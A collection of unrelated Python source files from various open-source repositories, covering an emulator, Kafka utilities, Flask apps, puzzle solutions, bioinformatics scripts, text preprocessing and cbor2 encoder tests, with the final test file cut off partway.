nes/processors/cpu/instructions/flags/sed.py | Hexadorsimal/pynes | 1 | 12759636 | from .set import SetInstruction
class Sed(SetInstruction):
flag_name = 'd'
| 1.679688 | 2 |
kafka_utils/kafka_rolling_restart/task.py | dbgrigsby/kafka-utils | 302 | 12759637 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import shlex
class TaskFailedException(Exception):
pass
class Task(object):
"""Base class for implementing Task
All the args passed can be accessed via self.args
:param args: The program arguments
"""
def __init__(self, args):
if args:
self.args = self.parse_args(list(
shlex.split(args)
))
else:
self.args = self.parse_args([])
def parse_args(self, args):
"""Parse args command line arguments.
:param args: The list of arguments as strings.
"""
pass
def run(self, host):
"""This contains the main logic of the task
Please note an exception from this method will completely stop the restart
:param host: the host on which precheck is executed on
:type host: string
"""
raise NotImplementedError("Implemented in subclass")
class PreStopTask(Task):
"""Class to be used for any pre stop checks"""
class PostStopTask(Task):
"""Class to be used for any post stop checks"""
| 2.390625 | 2 |
app/models/Person.py | illeatmyhat/flask-swagger-mongo | 0 | 12759638 | <reponame>illeatmyhat/flask-swagger-mongo
from marshmallow_mongoengine import ModelSchema
from flask_admin.contrib.mongoengine import ModelView
from mongoengine.connection import get_db
from pymongo import TEXT
from slugify import slugify
from . import db, definitions
definitions['Person'] = {
'type': 'object',
'properties': {
'first_name': {
'type': 'string'
},
'last_name': {
'type': 'string'
},
'email': {
'type': 'string'
},
'slug': {
'type': 'string'
},
'aliases': {
'type': 'array',
'items': {
'type': 'string'
}
}
},
'example': {
'first_name': 'John',
'last_name': 'Smith',
'email': '<EMAIL>',
'slug': 'john-smith-usa-example-com',
'aliases': ['<NAME>', '<NAME>']
}
}
class Person(db.Document):
first_name = db.StringField(max_length=100, required=True)
last_name = db.StringField(max_length=100, required=True)
email = db.EmailField(max_length=100, required=True)
slug = db.StringField(max_length=100) # hidden field
aliases = db.ListField(db.StringField(max_length=100))
# not so easy to make a full text search index
def __init__(self, *args, **values):
super().__init__(*args, **values)
mongo = get_db()['Person']
if '$**_text' not in mongo.index_information():
mongo.create_index([('$**', TEXT)])
def __unicode__(self):
return self.email
def save(self, *args, **kwargs):
if not self.slug:
self.slug = slugify(self.email)
return super(Person, self).save(*args, **kwargs)
@staticmethod
def serialize(person):
return person_schema.dump(person).data
@staticmethod
def deserialize(person):
return person_schema.load(person).data
class PersonSchema(ModelSchema):
class Meta:
model = Person
class PersonView(ModelView):
form_excluded_columns = {'slug'}
column_filters = ['first_name']
column_list = ('first_name', 'last_name', 'email', 'slug', 'aliases')
person_schema = PersonSchema()
| 2.34375 | 2 |
2020/01.py | sumnerevans/advent-of-code | 5 | 12759639 | #! /usr/bin/env python3
from typing import List
with open("inputs/01.txt") as f:
lines: List[str] = [l.strip() for l in f.readlines()]
expenses = sorted(int(l) for l in lines)
L = len(expenses)
print("Part 1:")
def part1() -> int:
for _, a in enumerate(expenses):
complement = 2020 - a
low, hi = 0, L
prev = 0
while True:
mid_idx = low + (hi - low) // 2
if mid_idx == prev:
break
mid = expenses[mid_idx]
if mid == complement:
return a * complement
elif mid < complement:
low = mid_idx
else:
hi = mid_idx
assert False
ans_part1 = part1()
print(ans_part1)
assert ans_part1 == 355875
print("Part 2:")
def part2() -> int:
for i, a in enumerate(expenses):
for j, b in enumerate(expenses):
if i < j:
continue
for k, c in enumerate(expenses):
if k < j or k < i:
continue
if a + b + c == 2020:
return a * b * c
assert False
ans_part2 = part2()
print(ans_part2)
assert ans_part2 == 140379120
| 3.5 | 4 |
planar_ising/common_utils.py | ValeryTyumen/planar_ising | 8 | 12759640 | <reponame>ValeryTyumen/planar_ising<gh_stars>1-10
import numpy as np
def repeat_int(value, count):
array = np.zeros(count, dtype=np.int32)
array[:] = value
return array
def repeat_bool(value, count):
array = np.zeros(count, dtype=np.bool_)
array[:] = value
return array
def repeat_float(value, count):
array = np.zeros(count, dtype=np.float32)
array[:] = value
return array
| 2.59375 | 3 |
ba5g-edit-distance/edit_distance.py | kjco/bioinformatics-algorithms | 0 | 12759641 | ##str1 = 'PLEASANTLY'
##str2 = 'MEANLY'
with open('dataset_77_3.txt','r') as f:
str1 = f.readline().strip()
str2 = f.readline().strip()
# Initialize the matrix
m = [[0 for j in range(len(str2)+1)] for i in range(len(str1)+1)]
#b = [[0 for j in range(len(str2)+1)] for i in range(len(str1)+1)]
# m = [ [0] * (len(str2)+1) ] * (len(str1)+1)
# b = [ [0] * (len(str2)+1) ] * (len(str1)+1)
#print 'matrix is %dx%d' % (len(m), len(m[0]))
for j in range(len(str2)+1):
m[0][j] = j
for i in range(len(str1)+1):
m[i][0] = i
#print m
for i in xrange(1, len(str1)+1):
for j in xrange(1, len(str2)+1):
m[i][j] = m[i-1][j] + 1
if m[i][j-1] + 1 < m[i][j]:
m[i][j] = m[i][j-1] + 1
if m[i-1][j-1] + 1 < m[i][j]:
m[i][j] = m[i-1][j-1] + 1
if str1[i-1] == str2[j-1] and m[i-1][j-1]+0 < m[i][j]:
m[i][j] = m[i-1][j-1] + 0
#print i,j, m[i][j], b[i][j]
#print b
#print m
print m[len(str1)][len(str2)]
| 3.15625 | 3 |
python3/135.candy.340359562.ac.py | Diego-Zulu/leetcode_answers | 0 | 12759642 | <gh_stars>0
#
# @lc app=leetcode id=135 lang=python3
#
# [135] Candy
#
# https://leetcode.com/problems/candy/description/
#
# algorithms
# Hard (30.87%)
# Likes: 815
# Dislikes: 154
# Total Accepted: 125.7K
# Total Submissions: 406.8K
# Testcase Example: '[1,0,2]'
#
# There are N children standing in a line. Each child is assigned a rating
# value.
#
# You are giving candies to these children subjected to the following
# requirements:
#
#
# Each child must have at least one candy.
# Children with a higher rating get more candies than their neighbors.
#
#
# What is the minimum candies you must give?
#
# Example 1:
#
#
# Input: [1,0,2]
# Output: 5
# Explanation: You can allocate to the first, second and third child with 2, 1,
# 2 candies respectively.
#
#
# Example 2:
#
#
# Input: [1,2,2]
# Output: 4
# Explanation: You can allocate to the first, second and third child with 1, 2,
# 1 candies respectively.
# The third child gets 1 candy because it satisfies the above two
# conditions.
#
#
#
# @lc code=start
class Solution:
def candy(self, ratings: List[int]) -> int:
last_max_pos = -1
last_max_candies = -1
candies = 0
last_candy_gave = 0
for i, r in enumerate(ratings):
last_rating = ratings[i-1] if i > 0 else -1
candy_to_give = last_candy_gave
if r > last_rating:
candy_to_give += 1
else:
candy_to_give = 1
if r < last_rating and last_candy_gave == candy_to_give:
diff = i - last_max_pos
candies += diff
if diff < last_max_candies:
candies -= 1
candies += candy_to_give
last_candy_gave = candy_to_give
if r >= last_rating:
last_max_pos = i
last_max_candies = candy_to_give
return candies
# @lc code=end
| 3.625 | 4 |
tess/server/blueprints/summarization_bp.py | ashishbaghudana/tess | 1 | 12759643 | import json
import os
import uuid
import mongoengine
from flask import Blueprint, jsonify, request
from werkzeug.utils import secure_filename
from tess.config import UPLOAD_FILES
from tess.server.models import SummarizationDocument
summarization_bp = Blueprint('summarization_api', __name__)
@summarization_bp.route('', methods=['GET', 'POST'])
def summarize():
if request.method == 'POST':
body = request.form.to_dict()
if 'file' not in request.files:
return jsonify({'error': 400, 'message': 'Must supply a file'}), 400
if not allowed_file(request.files['file'].filename):
return jsonify({'error': 400, 'message': 'The file must be .txt'}), 400
if 'algorithm' not in body:
return jsonify({'error': 400, 'message': 'Algorithm should be specified'}), 400
file = request.files['file']
filename = secure_filename(file.filename)
renamed_file = f"{uuid.uuid4().hex}.{get_extension(filename)}"
file.save(os.path.join(UPLOAD_FILES, renamed_file))
doc = SummarizationDocument(document_path=os.path.join(UPLOAD_FILES, renamed_file), algorithm=body['algorithm'])
if 'tokenized' in body and body['tokenized']:
doc.tokenized = True
with open(os.path.join(UPLOAD_FILES, renamed_file)) as f:
doc.processed_text = f.read().strip()
if 'tokenizer' in body:
doc.tokenizer = body['tokenizer']
if 'target' in request.files:
target_summary = request.files['target'].stream.read().decode()
doc.target_summary = target_summary
doc.status = 'NEW'
doc.save()
return jsonify(json.loads(doc.to_json())), 201
if request.method == 'GET':
documents = []
for doc in SummarizationDocument.objects():
documents.append({'id': str(doc.id),
'status': doc.status,
'algorithm': doc.algorithm,
'created_at': doc.created_at
})
return jsonify(documents)
@summarization_bp.route('/<doc_id>', methods=['GET'])
def get_summary(doc_id):
try:
document = SummarizationDocument.objects.get(pk=doc_id)
return jsonify(json.loads(document.to_json()))
except mongoengine.errors.DoesNotExist as _:
return jsonify({'error': 400, 'message': 'ID does not exist'})
except mongoengine.errors.ValidationError as _:
return jsonify({'error': 400, 'message': 'ID is invalid format'})
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() == 'txt'
def get_extension(filename):
return filename.rsplit('.', 1)[1].lower()
| 2.21875 | 2 |
sra.py | nelas/sra.py | 5 | 12759644 | <gh_stars>1-10
#!/usr/bin/env python
'''Search & Fetch records from NCBI's Sequence Read Archive.
Use http://www.ncbi.nlm.nih.gov/sra/advanced to build a query and the script
will output a CSV file with the results. Example:
./sra.py -s 'agalma[Organism]' -m 3 -o sra_output -e <EMAIL>
A more fine grained filtering based on the read length, library layout, number
of spots, platform, etc... needs to be done on a separate script importing this
program as a module. Check fetch_sra.py for an example on how to filter.
'''
import argparse
import os
import pandas as pd
import re
from Bio import Entrez
class SRADatabase:
'''General information about SRA Database'''
def __init__(self):
einfo_handle = Entrez.einfo(db='sra')
einfo = Entrez.read(einfo_handle, validate=False)
# Define attributes.
self.count = einfo['DbInfo']['Count']
self.last_update = einfo['DbInfo']['LastUpdate']
self.menu_name = einfo['DbInfo']['MenuName']
self.description = einfo['DbInfo']['Description']
self.link_list = einfo['DbInfo']['LinkList']
self.field_list = einfo['DbInfo']['FieldList']
self.einfo = einfo
print('\n' + self.description + ' (%s)' % self.menu_name)
print(self.count + ' entries, last updated in ' + self.last_update)
print('Available search fields: ')
for field in self.field_list:
print('\t[%s] %s | %s (%s terms)' % (field['Name'], field['FullName'], field['Description'], field['TermCount']))
# TODO Use def __unicode__ or __str__ to identify class objects.
class SRASearch:
'''Perform search and keep IDs of SRA packages.
Example of query:
((((("strategy rna seq"[Properties]) AND "platform illumina"[Properties])
AND metazoa[Organism]) NOT vertebrata[Organism]) NOT insects[Organism]) AND
("2000/01/01"[Modification Date] : "3000"[Modification Date])
'''
def __init__(self, query, retmax, email):
# Required arguments.
# TODO Cache search based on query. Store list of IDs!
self.query = query
if int(retmax) > 100000:
# Limit defined by Entrez.
self.retmax = 100000
else:
self.retmax = retmax
Entrez.email = email
# Search metadata.
self.count = None
self.retstart = None
self.query_translation = None
self.idlist = None
# Additional attributes.
self.results = None
self.database = SRADatabase()
# TODO Add timestamp.
def esearch(self):
'''Search SRA packages with Entrez using query.'''
handle = Entrez.esearch(db='sra', term=self.query, retmax=self.retmax)
self.results = Entrez.read(handle)
self.parse_results()
print('\nSuccess! %s results found.' % self.count)
print('Your query was: %s' % self.query_translation)
print('Returned IDs (max=%s): %s' % (self.retmax, ', '.join(self.idlist)))
return self.results
def parse_results(self):
'''Populate class attributes by parsing results.'''
self.count = self.results['Count']
self.retstart = self.results['RetStart']
self.query_translation = self.results['QueryTranslation']
self.idlist = self.results['IdList']
print('\nFetched %d package IDs.' % len(self.idlist))
class SRAPackage:
'''Fetch and store metadata from a SRA package.'''
def __init__(self, sra_id):
self.id = sra_id
self.record = None
self.cached_filepath = os.path.join('.cache', self.id)
self.accession = None
self.title = None
self.study_title = None
self.library_strategy = None
self.library_layout = None
self.instrument_model = None
self.taxon_id = None
self.scientific_name = None
self.lineage = None
self.run_accession = None
self.nreads = None
self.read_average = None
self.total_spots = None
self.total_bases = None
self.size = None
self.published = None
# Define header section for CSV. Must match self.metadata.
self.header = ['id', 'accession', 'title', 'lineage',
'taxon_id', 'scientific_name',
'library_strategy', 'library_layout',
'instrument_model', 'run_accession',
'nreads', 'read_average', 'total_spots',
'total_bases', 'size', 'published']
# Do the actual metadata fetching.
self.efetch()
# Retrieve whole lineage by taxon ID.
self.get_lineage()
# Fill metadata set for later processing.
self.metadata = (self.id, self.accession, self.title, self.lineage,
self.taxon_id, self.scientific_name,
self.library_strategy, self.library_layout,
self.instrument_model, self.run_accession,
self.nreads, self.read_average, self.total_spots,
self.total_bases, self.size, self.published,)
print('Done!')
def efetch(self):
'''Fetch package metadata from Entrez'''
print('\nProcessing ID=%s' % self.id)
cached_file = self.cache()
if cached_file:
self.record = cached_file.read()
cached_file.close()
else:
print('Record not in cache. Fetching...')
handle = Entrez.efetch(db='sra', id=self.id)
self.record = handle.read()
# Write cache file.
new_cache = open(self.cached_filepath, 'w')
new_cache.write(self.record)
new_cache.close()
self.extract()
def cache(self):
'''Write and read cache files.'''
# Make sure folder exists.
cache_folder = '.cache'
if not os.path.isdir(cache_folder):
os.mkdir(cache_folder)
# Try to get cache file.
try:
cached = open(self.cached_filepath)
return cached
except:
return None
def extract(self):
'''Extract relevant fields from summary.'''
# Fields with attributes.
fields = {}
# Fields to be parsed.
regexes = {
'accession': '<EXPERIMENT\s+.*?accession="(?P<accession>.*?)".*?>',
'title': '<EXPERIMENT\s+.*?>.*?<TITLE>(?P<title>.*?)<\/TITLE>',
'study_title': '<STUDY_TITLE>(?P<study_title>.*?)<\/STUDY_TITLE>',
'library_strategy': '<LIBRARY_STRATEGY>(?P<library_strategy>.*?)<\/LIBRARY_STRATEGY>',
'library_layout': '<LIBRARY_LAYOUT>\s*<(?P<library_layout>SINGLE|PAIRED)',
'instrument_model': '<INSTRUMENT_MODEL>(?P<instrument_model>.*?)<\/INSTRUMENT_MODEL>',
'taxon_id': '<TAXON_ID>(?P<taxon_id>.*?)<\/TAXON_ID>',
'scientific_name': '<SCIENTIFIC_NAME>(?P<scientific_name>.*?)<\/SCIENTIFIC_NAME>',
'run_accession': '<RUN\s+.*?accession="(?P<run_accession>.*?)"\s+.*?total_spots="(?P<total_spots>.*?)"\s+.*?total_bases="(?P<total_bases>.*?)"\s+.*?size="(?P<size>.*?)"\s+.*?published="(?P<published>.*?)"\s+.*?>',
'nreads': '<Statistics\s+.*?nreads="(?P<nreads>.*?)"\s+.*?>',
'read_average': '<Read\s+.*?average="(?P<read_average>.*?)"\s+.*?\/>',
}
# Iterate over regexes to parse attributes.
# TODO handle multiple matches like "runs", "nreads", and "average"?
# Right now it only gets the first run accession, nreads and
# read_average. This is OK for now, since it is only a primary filter.
for field, regex in regexes.iteritems():
re_search = re.search(regex, self.record)
if re_search:
re_groups = re_search.groupdict()
if re_groups:
for k, v in re_groups.iteritems():
fields[k] = v
else:
if field in ['taxon_id', 'nreads', 'read_average',
'total_spots', 'total_bases', 'size']:
fields[field] = 0
else:
fields[field] = ''
else:
if field in ['taxon_id', 'nreads', 'read_average',
'total_spots', 'total_bases', 'size']:
fields[field] = 0
else:
fields[field] = ''
self.accession = fields['accession']
self.title = fields['title']
if not self.title:
self.title = fields['study_title']
self.library_strategy = fields['library_strategy']
self.library_layout = fields['library_layout']
self.instrument_model = fields['instrument_model']
self.taxon_id = int(fields['taxon_id'])
self.scientific_name = fields['scientific_name']
# Catch nreads="variable". See https://github.com/nelas/sra.py/issues/1
try:
self.nreads = int(fields['nreads'])
except:
self.nreads = 1
self.read_average = int(float(fields['read_average']))
self.run_accession = fields['run_accession']
if self.run_accession:
self.total_spots = int(fields['total_spots'])
self.total_bases = int(fields['total_bases'])
self.size = int(fields['size'])
self.published = fields['published']
else:
self.total_spots = 0
self.total_bases = 0
self.size = 0
self.published = ''
def get_lineage(self):
'''Fetch hierarchy from NCBI's Taxonomy database.'''
# Open taxa cache file.
try:
cached_taxa = pd.DataFrame.from_csv('.cache/taxa.csv')
except:
cached_taxa = pd.DataFrame(columns=['taxon_id', 'lineage', 'scientific_name'])
# Fetch row with taxon_id.
taxon_row = cached_taxa[cached_taxa.taxon_id == self.taxon_id]
if not taxon_row.empty:
self.scientific_name = taxon_row.scientific_name.values[0]
self.lineage = taxon_row.lineage.values[0]
else:
print('Taxon %d not in cache. Fetching...' % self.taxon_id)
handle = Entrez.efetch(db='taxonomy', id=str(self.taxon_id))
taxon = Entrez.read(handle)
self.scientific_name = taxon[0]['ScientificName']
self.lineage = taxon[0]['Lineage'] + '; ' + self.scientific_name
new_cache = cached_taxa.append([{'taxon_id': self.taxon_id,
'lineage': self.lineage,
'scientific_name': self.scientific_name}])
new_cache.to_csv('.cache/taxa.csv')
class FilterPackages:
'''Build data frame with package metadata for filtering.'''
def __init__(self, packages, filter=None):
self.packages = packages
self.data_frame = None
self.build_data_frame()
self.filtered_data_frame = self.data_frame
def build_data_frame(self):
'''Get metadata from each package and save to data frame'''
data = []
index_ids = []
header = []
for package in self.packages:
data.append(package.metadata)
index_ids.append(package.metadata[0])
header = package.header
self.data_frame = pd.DataFrame(data, index=index_ids, columns=header)
def write_csv(self, basename):
'''Write CSV file from data frame.'''
self.data_frame.to_csv(basename + '_unfiltered' + '.csv', index=False)
self.filtered_data_frame.to_csv(basename + '.csv', index=False)
print('\n%d of %d packages written to "%s" after filtering.\n' % (self.filtered_data_frame.index.size, self.data_frame.index.size, basename + '.csv'))
def main():
'''Parse arguments and call SRA search.
Main function simply parses arguments from command line input and assures
everything is ok to instantiate the SRA search class.
'''
# Parse arguments.
parser = argparse.ArgumentParser(description='Search & Fetch records from NCBI\'s Sequence Read Archive.',
epilog='Work out those reads, dude.')
parser.add_argument('-s', '--search',
help='put search terms between "quotes"',
type=str, required=True)
parser.add_argument('-m', '--maximum',
help='maximum number of records to be retrieved',
default='20')
parser.add_argument('-o', '--output',
help='indicate output CSV file',
required=True)
parser.add_argument('-e', '--email',
help='an email address is required for Entrez',
required=True)
args = parser.parse_args()
# Instantiate search object.
sra_search = SRASearch(query=args.search, retmax=args.maximum,
email=args.email)
# Execute search itself.
sra_search.esearch()
# Fetch metadata from packages.
packages = [SRAPackage(sra_id) for sra_id in sra_search.idlist]
# Store packages in data frame for filtering.
packages_to_filter = FilterPackages(packages)
# Write CSV out.
packages_to_filter.write_csv(args.output)
if __name__ == '__main__':
main()
| 2.859375 | 3 |
concurrency/demo5.py | waveform80/presentations | 0 | 12759645 | <reponame>waveform80/presentations<gh_stars>0
import zmq
ctx = zmq.Context.instance()
server = ctx.socket(zmq.ROUTER)
server.bind('inproc://foo')
clients = [ctx.socket(zmq.REQ) for i in range(10)]
for i, client in enumerate(clients):
client.connect('inproc://foo')
client.send_string('FOO%d' % i)
messages = []
while server.poll(0):
messages.append(server.recv_multipart())
for msg in messages:
print(repr(msg))
| 2.5625 | 3 |
concurrence/download_by_multi_process.py | dnxbjyj/python-basic | 3 | 12759646 | <reponame>dnxbjyj/python-basic
# coding:utf-8
# 使用多进程下载多个网页
import requests
from utils import urls,fn_timer
from multiprocessing import Process,Pool
def download_page(url):
resp = requests.get(url)
return resp
# 使用进程池下载多个网页的内容
@fn_timer
def download_using_process_pool(urls):
# 创建一个进程池,数字表示一次性同时执行的最大子进程数
pool = Pool(20)
# 返回值列表
resps = []
# 并发执行多个任务,并获取任务返回值
resps = pool.map_async(requests.get,urls)
print 'Processes will start...'
pool.close()
pool.join()
print 'All processes end, results is: {0}'.format(resps.get())
return resps.get()
if __name__ == '__main__':
resps = download_using_process_pool(urls)
print len(resps) | 3.1875 | 3 |
algovera/jupyterfrontend.py | AlgoveraAI/jupyterlab_extensions | 2 | 12759647 | <filename>algovera/jupyterfrontend.py
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) ipylab contributors.
# Distributed under the terms of the Modified BSD License.
import asyncio
from ipywidgets import CallbackDispatcher, Widget, register, widget_serialization
from traitlets import Instance, Unicode
from ._version import module_name, module_version
from .commands import CommandRegistry
from .shell import Shell
from .sessions import SessionManager
from .ocean_transaction import OceanMarket
@register
class JupyterFrontEnd(Widget):
_model_name = Unicode("JupyterFrontEndModel").tag(sync=True)
_model_module = Unicode(module_name).tag(sync=True)
_model_module_version = Unicode(module_version).tag(sync=True)
version = Unicode(read_only=True).tag(sync=True)
shell = Instance(Shell).tag(sync=True, **widget_serialization)
commands = Instance(CommandRegistry).tag(sync=True, **widget_serialization)
sessions = Instance(SessionManager).tag(sync=True, **widget_serialization)
def __init__(self, *args, **kwargs):
super().__init__(
*args,
shell=Shell(),
commands=CommandRegistry(),
sessions=SessionManager(),
ocean = OceanMarket(),
**kwargs
)
self._ready_event = asyncio.Event()
self._on_ready_callbacks = CallbackDispatcher()
self.on_msg(self._on_frontend_msg)
self.private_key = ''
self.ocean = OceanMarket()
def _on_frontend_msg(self, _, content, buffers):
if content.get("event", "")[0:9] == "lab_ready":
self.private_key = content.get("event", "")[10:]
self._ready_event.set()
self._on_ready_callbacks()
if self.private_key != '':
self.ocean = OceanMarket(self.private_key)
async def ready(self):
await self._ready_event.wait()
def on_ready(self, callback, remove=False):
self._on_ready_callbacks.register_callback(callback, remove)
| 1.945313 | 2 |
src/preprocessing/preprocessing.py | pradeep90/reddit-post-classifier | 0 | 12759648 | # Source: https://medium.com/@datamonsters/text-preprocessing-in-python-steps-tools-and-examples-bf025f872908
# reading level of posts coming out as negative for most posts because of the way they are written
import re
import pandas as pd
import numpy as np
import time
import nltk
nltk.download('wordnet') #TODO: should add this to the make file?
# for sentiment analysis
from textblob import TextBlob
# for readability score
import textstat
DEBUG = True
TIME_DEBUG = True
INCLUDE_SENTIMENT_FEATURE = False
INCLUDE_READABILITY_FEATURE = False
PATH_TO_DATA = '../../data/'
DATA_FILE_NAME = 'rspct.tsv'
DATA = PATH_TO_DATA+DATA_FILE_NAME
OUTPUT_FILE_NAME = 'rspct_preprocessed_sentiment_readability_stemmed.tsv'
def lowercase(df):
if DEBUG:
print('Lowercasing the dataset')
df=df.apply(lambda x: x.astype(str).str.lower())
return df
def remove_nums(df):
if DEBUG:
print('Removing numbers from all attributes except id')
for col in df.columns:
if col not in ['id']:
df[col] = df[col].str.replace('\d+', '')
return df
def remove_tags_puncts_whites(text):
text = text.strip()
# to remove > tags. TODO: there might be other such tags that need to be removed
p1 = re.compile(r'>|&|<')
text = p1.sub(' ', text)
# to remove tags inside {}, [] and HTML tags
p2 = re.compile(r'[<{\[].*?[>}\]]')
text = p2.sub(' ', text)
# remove single quotes only if they preceded or follow a word
text1 = re.sub(r"((?P<a>\s)'(?P<x>\w))|((?P<y>\w)'(?P<b>\s))|((?P<c>\s)'(?P<d>\s))", r'\g<a>\g<x>\g<y>\g<b>\g<c>\g<d>', text)
text = re.sub(r"((?P<a>\s)'(?P<x>\w))|((?P<y>\w)'(?P<b>\s))|((?P<c>\s)'(?P<d>\s))", r'\g<a>\g<x>\g<y>\g<b>\g<c>\g<d>', text1)
text = text.strip("'")
# to remove punctuations (after removing tags etc.)
#puncts_to_remove = """!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""
puncts_to_remove = """!"#$%&()*+,-./:;<=>?@[\]^_`{|}~"""
text = text.translate({ord(c): ' ' for c in puncts_to_remove})
# print('ret:', text.strip())
return text.strip()
def remove_tags_puncts_whitespaces(data):
"""
Removes punctuations, HTML tags, and other tags inside {} or [] brackets and whitespaces
"""
if DEBUG:
print('Removing punctuations, tags and whitespaces')
for col in data.columns:
if col not in ['id', 'subreddit', 'sentiment_val', 'readability_score']:
data[col] = data[col].apply(remove_tags_puncts_whites)
return data
def stem_text(text):
stemmer = nltk.stem.PorterStemmer()
tokenized_text = nltk.tokenize.word_tokenize(text)
stemmed_words = [stemmer.stem(word) for word in tokenized_text]
#print('stemmed=',' '.join(stemmed_words))
return ' '.join(stemmed_words)
def stem_data(data):
"""
Replace all words with their stem words
"""
if DEBUG:
print ('Stemming the data')
for col in data.columns:
if col not in ['id', 'subreddit', 'sentiment_val', 'readability_score']:
data[col] = data[col].apply(stem_text)
return data
def lemmatize_text(text):
lemmatizer = nltk.stem.WordNetLemmatizer()
tokenized_text=nltk.tokenize.word_tokenize(text)
lemmatized_words = [lemmatizer.lemmatize(word) for word in tokenized_text]
#print('lemmatized:',' '.join(lemmatized_words))
return ' '.join(lemmatized_words)
def lemmatize_data(data):
if DEBUG:
print ('Lemmatizing the data')
for col in data.columns:
if col not in ['id', 'subreddit', 'sentiment_val', 'readability_score']:
data[col] = data[col].apply(lemmatize_text)
return data
def text_sentiment(text):
"""
Given input text, returns a scalar estimate of the sentiment of that text.
Polarity is float which lies in the range of [-1,1] where 1 means positive statement and -1 means a negative statement.
"""
# return indicoio.sentiment_hq(text)
return TextBlob(text).sentiment.polarity
def include_sentiment(data):
data['title_selftext'] = data['title'] + ' ' + data['selftext']
data['sentiment_val'] = data['title_selftext'].apply(text_sentiment)
data = data.drop(['title_selftext'], 1)
return data
def text_readability_score(text):
return textstat.flesch_reading_ease(text)
def include_readability_score(data):
data['title_selftext'] = data['title'] + ' ' + data['selftext']
data['readability_score'] = data['title_selftext'].apply(text_readability_score)
data = data.drop(['title_selftext'], 1)
return data
def preprocess(data):
t0 = time.time()
data = lowercase(data)
t1 = time.time()
if TIME_DEBUG:
print('Lowercasing took time: {}'.format(t1-t0))
t0 = time.time()
if INCLUDE_SENTIMENT_FEATURE:
data = include_sentiment(data)
if TIME_DEBUG:
print('Sentiment calculations took time: {}'.format(time.time()-t0))
t0 = time.time()
if INCLUDE_READABILITY_FEATURE:
data = include_readability_score(data)
if TIME_DEBUG:
print('Readability score calculations took time: {}'.format(time.time()-t0))
# t0 = time.time()
# data = remove_nums(data)
# t1 = time.time()
# if TIME_DEBUG:
# print('That took time: {}'.format(t1-t0))
"""
t0 = time.time()
data = remove_tags_puncts_whitespaces(data)
t1 = time.time()
if TIME_DEBUG:
print('Removing punctuations took time: {}'.format(t1-t0))
"""
"""
t0 = time.time()
data = stem_data(data)
t1 = time.time()
if DEBUG:
print('Stemming took time: {}'.format(t1-t0))
"""
"""
t0 = time.time()
data = lemmatize_data(data)
t1 = time.time()
if DEBUG:
print('Lemmatization took time: {}'.format(t1-t0))
"""
return data
def main():
if DEBUG:
print('Reading the data')
t0 = time.time()
df = pd.read_csv(DATA, sep='\t')
# df = pd.read_csv(DATA, sep='\t', nrows=1000)
preprocessed_df = preprocess(df)
# preprocessed_df.to_csv(OUTPUT_FILE_NAME, sep='\t', index=False)
t1 = time.time()
if TIME_DEBUG:
print('Total time taken: {}'.format(t1-t0))
if __name__ == '__main__':
main()
| 3 | 3 |
tests/test_encoder.py | bazurbat/cbor2 | 0 | 12759649 | import re
from binascii import unhexlify
from datetime import datetime, timedelta, date
from decimal import Decimal
from email.mime.text import MIMEText
from fractions import Fraction
from uuid import UUID
import pytest
from cbor2.compat import timezone
from cbor2.encoder import dumps, CBOREncodeError, dump, shareable_encoder
from cbor2.types import CBORTag, undefined, CBORSimpleValue
@pytest.mark.parametrize('value, expected', [
(0, '00'),
(1, '01'),
(10, '0a'),
(23, '17'),
(24, '1818'),
(100, '1864'),
(1000, '1903e8'),
(1000000, '1a000f4240'),
(1000000000000, '1b000000e8d4a51000'),
(18446744073709551615, '1bffffffffffffffff'),
(18446744073709551616, 'c249010000000000000000'),
(-18446744073709551616, '3bffffffffffffffff'),
(-18446744073709551617, 'c349010000000000000000'),
(-1, '20'),
(-10, '29'),
(-100, '3863'),
(-1000, '3903e7')
])
def test_integer(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
@pytest.mark.parametrize('value, expected', [
(1.1, 'fb3ff199999999999a'),
(1.0e+300, 'fb7e37e43c8800759c'),
(-4.1, 'fbc010666666666666'),
(float('inf'), 'f97c00'),
(float('nan'), 'f97e00'),
(float('-inf'), 'f9fc00')
])
def test_float(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
@pytest.mark.parametrize('value, expected', [
(b'', '40'),
(b'\x01\x02\x03\x04', '4401020304'),
])
def test_bytestring(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
def test_bytearray():
expected = unhexlify('4401020304')
assert dumps(bytearray(b'\x01\x02\x03\x04')) == expected
@pytest.mark.parametrize('value, expected', [
(u'', '60'),
(u'a', '6161'),
(u'IETF', '6449455446'),
(u'"\\', '62225c'),
(u'\u00fc', '62c3bc'),
(u'\u6c34', '63e6b0b4')
])
def test_string(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
@pytest.mark.parametrize('value, expected', [
(False, 'f4'),
(True, 'f5'),
(None, 'f6'),
(undefined, 'f7')
], ids=['false', 'true', 'null', 'undefined'])
def test_special(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
@pytest.mark.parametrize('value, expected', [
(CBORSimpleValue(0), 'e0'),
(CBORSimpleValue(2), 'e2'),
(CBORSimpleValue(19), 'f3'),
(CBORSimpleValue(32), 'f820')
])
def test_simple_value(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
#
# Tests for extension tags
#
@pytest.mark.parametrize('value, as_timestamp, expected', [
(datetime(2013, 3, 21, 20, 4, 0, tzinfo=timezone.utc), False,
'c074323031332d30332d32315432303a30343a30305a'),
(datetime(2013, 3, 21, 20, 4, 0, 380841, tzinfo=timezone.utc), False,
'c0781b323031332d30332d32315432303a30343a30302e3338303834315a'),
(datetime(2013, 3, 21, 22, 4, 0, tzinfo=timezone(timedelta(hours=2))), False,
'c07819323031332d30332d32315432323a30343a30302b30323a3030'),
(datetime(2013, 3, 21, 20, 4, 0), False, 'c074323031332d30332d32315432303a30343a30305a'),
